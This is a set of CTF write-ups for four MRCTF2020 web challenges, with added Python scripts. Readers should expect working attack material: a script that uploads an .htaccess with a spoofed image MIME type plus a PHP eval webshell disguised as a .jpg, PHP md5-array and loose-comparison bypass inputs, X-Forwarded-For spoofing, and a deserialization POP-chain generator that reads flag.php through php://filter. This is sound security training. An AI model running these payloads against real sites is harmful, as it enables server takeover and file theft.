## [MRCTF2020] 你传你🐎呢

### Key points

- .htaccess upload bypass

### Solution

Upload a .htaccess file. It is rejected at first, so intercept the request in Burp and change the file part's Content-Type to Image/jpeg; the upload then succeeds. Next upload a jpg webshell: because the .htaccess tells Apache to run .jpg files through the PHP interpreter, the shell can be connected to directly.
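What Burp is actually changing, shown as an added Python example that is not part of the original writeup: the upload is a multipart/form-data request, and a server-side MIME check reads the Content-Type header of the file part, not the bytes of the file. The form field name `uploaded`, the upload URL, and the .htaccess directive are assumptions; both file contents are constructed here. The .htaccess line assumes Apache with mod_php, where AddType is enough to hand .jpg files to PHP.

```python
import http.client
import secrets
from urllib.parse import urlparse

# Constructed sample files (assumptions, not taken from the challenge).
HTACCESS = b"AddType application/x-httpd-php .jpg\n"   # Apache + mod_php: run .jpg as PHP
SHELL_JPG = b"<?php @eval($_POST['cmd']); ?>\n"       # one-line webshell saved as shell.jpg


def build_multipart(field, filename, content, content_type, boundary=""):
    """Build a single-file multipart/form-data body.

    The 'Content-Type:' line of the part is the value a naive upload filter
    checks; it is the line that gets edited in Burp to image/jpeg while the
    filename stays .htaccess. Returns (body, boundary)."""
    boundary = boundary or secrets.token_hex(16)
    lines = [
        ("--%s" % boundary).encode(),
        ('Content-Disposition: form-data; name="%s"; filename="%s"' % (field, filename)).encode(),
        ("Content-Type: %s" % content_type).encode(),
        b"",
        content,
        ("--%s--" % boundary).encode(),
        b"",
    ]
    return b"\r\n".join(lines), boundary


def part_content_type(body):
    """Return the Content-Type declared by the first part (what the filter sees)."""
    for line in body.split(b"\r\n"):
        if line.lower().startswith(b"content-type:"):
            return line.split(b":", 1)[1].strip().decode()
    raise ValueError("no part Content-Type in body")


def upload(url, field, filename, content, content_type):
    """POST the file; returns the HTTP status. Network call, not exercised offline."""
    u = urlparse(url)
    body, boundary = build_multipart(field, filename, content, content_type)
    conn = http.client.HTTPConnection(u.hostname, u.port or 80, timeout=10)
    conn.request("POST", u.path or "/", body=body,
                 headers={"Content-Type": "multipart/form-data; boundary=" + boundary})
    resp = conn.getresponse()
    resp.read()
    conn.close()
    return resp.status


if __name__ == "__main__":
    # Assumed target URL and field name. Step 1: .htaccess with a spoofed image
    # MIME type. Step 2: the "jpg" that Apache will now execute as PHP.
    for name, data in ((".htaccess", HTACCESS), ("shell.jpg", SHELL_JPG)):
        print(name, upload("http://target.example/upload.php", "uploaded", name, data, "image/jpeg"))
```

Once both uploads are accepted, shell.jpg answers POST requests with a `cmd` parameter, which is what a webshell client connects to.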
## [MRCTF2020] Ez_bypass

### Key points

- md5 comparison flaw
- numeric string truncation

### Solution
```php
<?php
include 'flag.php';
$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';
if(isset($_GET['gg'])&&isset($_GET['id'])) {
    $id=$_GET['id'];
    $gg=$_GET['gg'];
    if (md5($id) === md5($gg) && $id !== $gg) {
        echo 'You got the first step';
        if(isset($_POST['passwd'])) {
            $passwd=$_POST['passwd'];
            if (!is_numeric($passwd))
            {
                if($passwd==1234567)
                {
                    echo 'Good Job!';
                    highlight_file('flag.php');
                    die('By Retr_0');
                }
                else
                {
                    echo "can you think twice??";
                }
            }
            else{
                echo 'You can not get it !';
            }
        }
        else{
            die('only one way to get the flag');
        }
    }
    else {
        echo "You are not a real hacker!";
    }
}
else{
    die('Please input first');
}
```
The first check is `md5($id) === md5($gg) && $id !== $gg`. Passing both parameters as arrays gets past it: on PHP 7, `md5()` cannot hash an array and returns NULL (with a warning), so `NULL === NULL` holds, while the two arrays themselves are not identical. The second check wants a value that is not numeric but loosely equals 1234567: a leading-numeric string such as `1234567a` fails `is_numeric()`, yet `==` against an integer casts it to 1234567 on PHP 7.

GET: `id[]=1&gg[]=2`
POST: `passwd=1234567a`

Both tricks rely on PHP 7 semantics: PHP 8 throws a TypeError when `md5()` receives an array, and `1234567a == 1234567` is false there because a non-numeric string is no longer cast to an integer.
## [MRCTF2020] PYWebsite

### Solution

Look at the page source, then visit flag.php, which says: "the verification logic is on the backend; nobody except the purchasers and me can see the flag." So the obvious move is to set the X-Forwarded-For header to 127.0.0.1, and that is enough.
## Ezpop

### Solution
```php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }
    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }
    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}
```
First, the clues:

- `Modifier` has `__invoke`, so calling an object of this class as a function triggers it, and `__invoke` passes `$var` to `include()`.
- `Show` has `__toString`, and its `__wakeup` runs `preg_match()` on `$this->source`. If `source` is itself a `Show` object, `preg_match()` has to stringify it, which fires `__toString` (the `echo` in `__construct` is a red herring: constructors are not run by `unserialize()`).
- `Test` has `__get`, and `Show::__toString` reads `$this->str->source`. If `str` is a `Test`, which has no `source` property, `__get` runs and calls `$this->p` as a function. `Modifier::$var` being protected does not block the chain; it only changes how the property name is serialized.
- `include()` accepts stream wrappers, so `php://filter` with `convert.base64-encode` reads `flag.php` as base64 instead of executing it.

Putting it together, the chain is `unserialize()` → `Show::__wakeup` → `preg_match()` → `Show::__toString` → `Test::__get` → `Modifier::__invoke` → `include('php://filter/...')`. The generator:
```php
<?php
class Modifier {
    protected $var = "php://filter/read=convert.base64-encode/resource=flag.php";
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
    }
    public function __toString(){
        return $this->str->source;
    }
}

class Test{
    public $p;
}

$a = new Show("test");
$a->str = new Test();
$a->str->p = new Modifier();
$b = new Show($a);
echo urlencode(serialize($b));
```
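The same serialized string built by hand in Python, as an added example that is not part of the original writeup. It makes visible why the generator ends with `urlencode()`: a protected property is serialized under the mangled name `\0*\0var`, and those two NUL bytes would not survive a raw query string. Class and property names are the ones from the challenge source; the object graph mirrors the PHP generator above; `flag.php` is the page's target.

```python
from urllib.parse import quote


class PhpObject:
    """Minimal stand-in for a PHP object: class name plus an ordered list of
    (visibility, name, value) properties, in declaration order."""

    def __init__(self, cls, props):
        self.cls = cls
        self.props = props

    def mangled_name(self, visibility, name):
        # serialize() encodes visibility inside the property name:
        #   public    -> name
        #   protected -> "\0*\0name"
        #   private   -> "\0ClassName\0name"
        if visibility == "public":
            return name
        if visibility == "protected":
            return "\x00*\x00" + name
        if visibility == "private":
            return "\x00" + self.cls + "\x00" + name
        raise ValueError(visibility)


def php_serialize(value):
    """Serialize the subset of PHP values this chain needs: string, null, object."""
    if value is None:
        return "N;"
    if isinstance(value, str):
        # s:<byte length>:"<raw bytes>";  -- the length counts the NUL bytes too
        return 's:%d:"%s";' % (len(value.encode()), value)
    if isinstance(value, PhpObject):
        body = "".join(
            php_serialize(value.mangled_name(vis, name)) + php_serialize(val)
            for vis, name, val in value.props
        )
        return 'O:%d:"%s":%d:{%s}' % (len(value.cls), value.cls, len(value.props), body)
    raise TypeError(type(value))


def build_pop(target="flag.php"):
    """Same object graph as the PHP generator: Show -> Show -> Test -> Modifier."""
    wrapper = "php://filter/read=convert.base64-encode/resource=" + target
    modifier = PhpObject("Modifier", [("protected", "var", wrapper)])
    test = PhpObject("Test", [("public", "p", modifier)])
    inner = PhpObject("Show", [("public", "source", "test"), ("public", "str", test)])
    # Outer Show: __wakeup runs preg_match() on $source, and $source being an
    # object is what stringifies inner and starts the chain. The regex never
    # sees "php://" because that string lives in Modifier::$var. $str is unset.
    outer = PhpObject("Show", [("public", "source", inner), ("public", "str", None)])
    return php_serialize(outer)


def build_url_payload(target="flag.php"):
    """Percent-encode everything, including NUL and '*', so it survives ?pop=..."""
    return quote(build_pop(target), safe="")


if __name__ == "__main__":
    print(build_url_payload())
```

Send the output as `?pop=<payload>`; the response then contains flag.php as base64, to be decoded locally.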